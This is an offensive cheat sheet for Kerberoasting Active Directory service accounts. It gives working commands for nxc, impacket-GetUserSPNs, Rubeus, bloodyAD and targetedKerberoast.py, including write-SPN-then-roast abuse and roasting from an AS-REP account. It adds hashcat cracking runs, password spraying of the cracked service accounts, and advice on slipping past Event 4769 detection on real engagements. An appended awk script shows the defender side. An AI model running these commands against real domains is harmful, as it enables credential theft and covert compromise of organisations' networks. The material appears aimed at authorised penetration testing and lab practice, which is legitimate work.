Kerberoasting
Request a service ticket (TGS) for any account that has an SPN. The DC hands it back encrypted with that account's Kerberos key (its NT hash for RC4, or an AES key derived from the password), so the ticket can be cracked offline without ever touching the account.
DC=10.10.11.50
DOMAIN=corp.local
USER='svc_user'
PASS='Password1'
i. Find Kerberoastable users
BloodHound query, see BloodHound:
MATCH (u:User {hasspn: true, enabled: true}) RETURN u.name, u.serviceprincipalnames
nxc shortcut, dump SPN candidates:
nxc ldap $DC -u $USER -p $PASS --get-sid ## helps disambiguate
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt
bloodyAD LDAP filter:
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC get search \
--filter '(&(objectClass=user)(servicePrincipalName=*)(!(samAccountName=krbtgt)))' \
--attr samaccountname,servicePrincipalName,memberOf
ii. Roast every roastable account, one shot
nxc, fastest and least painful:
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt
## With NTLM hash:
nxc ldap $DC -u $USER -H $NTHASH --kerberoasting roast.txt
impacket-GetUserSPNs, the classic:
impacket-GetUserSPNs -request -dc-ip $DC "$DOMAIN/$USER:$PASS" -outputfile roast.txt
## With hash:
impacket-GetUserSPNs -request -dc-ip $DC -hashes :$NTHASH "$DOMAIN/$USER" -outputfile roast.txt
## With Kerberos (KRB5CCNAME set):
impacket-GetUserSPNs -k -no-pass -request -dc-ip $DC "$DOMAIN/$USER" -outputfile roast.txt
## The output is already in hashcat/john format ($krb5tgs$23$...); no format flag is needed.
Rubeus (from a Windows foothold):
Rubeus.exe kerberoast /outfile:roast.txt
Rubeus.exe kerberoast /user:svc_account /outfile:roast.txt
Rubeus.exe kerberoast /rc4opsec /outfile:roast.txt ## skip accounts with AES enabled; only roast RC4-only accounts (no failed requests, and the tickets are fast to crack)
Rubeus.exe kerberoast /aes /outfile:roast.txt ## request AES tickets for AES-enabled accounts (hashcat -m 19600/19700, much slower to crack)
iii. Targeted Kerberoast (write-SPN-then-roast)
When you have GenericWrite, or WriteProperty on servicePrincipalName, over a user who has no SPN, add one temporarily, roast, then remove it. The ticket is still encrypted with the victim's own key, so this only pays off if the victim's password is crackable. nxc and targetedKerberoast.py automate the loop:
nxc targeted mode (sets cifs/<sam> SPN, roasts, removes):
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt --targeted-kerberoast victim1 victim2
## From a file list:
nxc ldap $DC -u $USER -p $PASS --kerberoasting roast.txt --targeted-kerberoast victims.list
targetedKerberoast.py (standalone, predates nxc’s built-in):
targetedKerberoast.py -d $DOMAIN -u $USER -p $PASS --dc-ip $DC
targetedKerberoast.py -d $DOMAIN -u $USER -H $NTHASH --dc-ip $DC --request-user victim1
Manual with bloodyAD when you want to control timing or stack with other ACL abuse:
## 1. Set a fake SPN on the victim (bloodyAD takes the attribute name positionally, the value via -v)
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC set object victim servicePrincipalName \
    -v "fake/svc.$DOMAIN"
## 2. Roast it (request only that user's ticket)
impacket-GetUserSPNs -request -request-user victim -dc-ip $DC "$DOMAIN/$USER:$PASS" -outputfile roast.txt
## 3. Clear the SPN again (no -v deletes the attribute) so the object is as you found it.
## Directory change auditing (Event 5136) still records both writes if it is enabled.
bloodyAD -d $DOMAIN -u $USER -p $PASS --host $DC set object victim servicePrincipalName
If you have GenericWrite over many users and want to chain attacks, manual gives you control. If you just want hashes fast, use nxc --targeted-kerberoast.
iv. Kerberoast from an ASREP-roastable account (no creds)
When you found an AS-REP roastable user but could not crack it, you can still kerberoast with that account: the DC will answer an AS-REQ from a no-preauth client for any service name, not just krbtgt, so you need neither the user's password nor a TGT. nxc has this built in:
nxc ldap $DC -u asrep_user -p '' --no-preauth-targets kerberoastable.list --kerberoasting roast.txt
--no-preauth-targets takes a file of kerberoastable users (or a single user); you have to supply the list because without credentials nxc cannot enumerate SPNs over LDAP. nxc sends one AS-REQ per target with the no-preauth user as the client principal and the target's SPN as the requested service, and the returned tickets crack exactly like normal roast output.
v. Cracking the hashes
Format check: RC4 lines look like $krb5tgs$23$*USERNAME$DOMAIN$SPN*$..., AES lines start with $krb5tgs$17$ or $krb5tgs$18$. Each etype needs its own hashcat mode, so split a mixed file before cracking:
head -1 roast.txt
Hashcat:
## RC4 (etype 23), the common one
hashcat -m 13100 roast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 13100 roast.txt rockyou.txt -r OneRuleToRuleThemAll.rule
## AES (etype 17/18)
hashcat -m 19600 roast.txt rockyou.txt ## AES128 etype 17
hashcat -m 19700 roast.txt rockyou.txt ## AES256 etype 18
AES tickets crack orders of magnitude slower than RC4: the AES key is derived from the password with PBKDF2 (4096 iterations of HMAC-SHA1), so each candidate costs thousands of hash operations instead of one MD4. Environments that have disabled RC4 only give you etype 17/18, so use targeted wordlists and rules rather than brute force. If you have GPU capacity, see Password Cracking for cloud cracking options.
vi. After cracking
The cracked password is for the SERVICE ACCOUNT. Spray it:
nxc smb $DC -u svc_account -p 'Cracked123!' --shares
nxc ldap $DC -u svc_account -p 'Cracked123!' --users
Service accounts often:
- have local admin on the host they run on
- sit in groups with weak ACLs
- share their password with other service accounts
Always re-collect BloodHound after compromising a new account.
vii. OpSec notes
- Kerberoasting sends one TGS-REQ per SPN, and the DC logs each as Event 4769 (service ticket requested). Detections typically key on a single account or client pulling many distinct service tickets in a short window, especially with ticket encryption type 0x17 (RC4) in a domain that otherwise uses AES.
- Rubeus /rc4opsec filters out accounts where RC4 is disabled, so no failed requests add noise.
- nxc --kerberoasting requests a ticket for every SPN it finds; expect to be detected on monitored networks.
- The no-preauth variant (section iv) sends AS-REQs rather than TGS-REQs, so it shows up in 4768 (TGT requested) logging under the no-preauth user instead of the usual 4769 burst, a pattern fewer detections cover.
For real engagements, kerberoast in small batches and let it look like normal Kerberos traffic. On HTB/labs, fire all at once.
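The defender's side of the 4769 note above, as an added example that is not from the original page: a small awk filter over constructed sample events that flags the pattern a monitored network will catch, one client pulling many distinct RC4 service tickets in one hour. The export layout "hour,account,client_ip,service_name,ticket_etype" is an assumption for this example; real SIEM exports differ, and in a real 4769 the service name field is the service account's sAMAccountName, which is why machine accounts (name$) and krbtgt are excluded.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the detection side of the 4769
# OpSec note, run over constructed sample data. Assumes events exported as
# "hour,account,client_ip,service_name,ticket_etype" (an assumption made for
# this example; real exports differ).
set -eu

# Constructed sample (not real logs): jdoe pulls five distinct RC4 service
# tickets in one hour (roasting), alice gets AES tickets (0x12), bob gets one
# RC4 ticket. FS01$ is a machine account and would be ignored either way.
write_sample_4769() {
  cat > "$1" <<'EOF'
09:12,jdoe,10.10.14.5,svc_sql,0x17
09:12,jdoe,10.10.14.5,svc_web,0x17
09:12,jdoe,10.10.14.5,svc_backup,0x17
09:12,jdoe,10.10.14.5,svc_report,0x17
09:12,jdoe,10.10.14.5,svc_sccm,0x17
09:12,jdoe,10.10.14.5,svc_sql,0x17
09:13,alice,10.10.20.7,FS01$,0x12
09:13,alice,10.10.20.7,svc_web,0x12
09:15,bob,10.10.20.9,svc_web,0x17
EOF
}

# Flag (hour, account, client) triples with at least THRESHOLD distinct RC4
# (0x17) service-ticket requests, ignoring krbtgt and machine accounts (name$).
# Prints "account client distinct_services" per hit; nothing when clean.
flag_roasting() {
  file="$1"; threshold="${2:-4}"
  awk -F, -v t="$threshold" '
    $5 == "0x17" && $4 != "krbtgt" && $4 !~ /\$$/ {
      seen[$1 "," $2 "," $3 "," $4] = 1        # distinct services per triple
    }
    END {
      for (k in seen) { split(k, p, ","); c[p[1] "," p[2] "," p[3]]++ }
      for (k in c) if (c[k] >= t) { split(k, p, ","); print p[2], p[3], c[k] }
    }' "$file"
}

# Typical run: flag_roasting 4769.csv 4
```

Roasting in small batches, as the note above suggests, is exactly what drags the per-hour distinct count under a threshold like this; the trade-off is that a lower threshold catches it again at the cost of false positives from busy service hosts.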
viii. Defense bypass: when you can’t roast directly
If standard --kerberoasting returns nothing useful and --targeted-kerberoast isn’t applicable, check:
- Resource-Based Constrained Delegation path -> Delegation (no roasting needed, you take the account directly)
- gMSA accounts -> Credential Dumping , pull the password if you have access
- DCSync rights -> DCSync , pull every NTLM hash instead of cracking TGS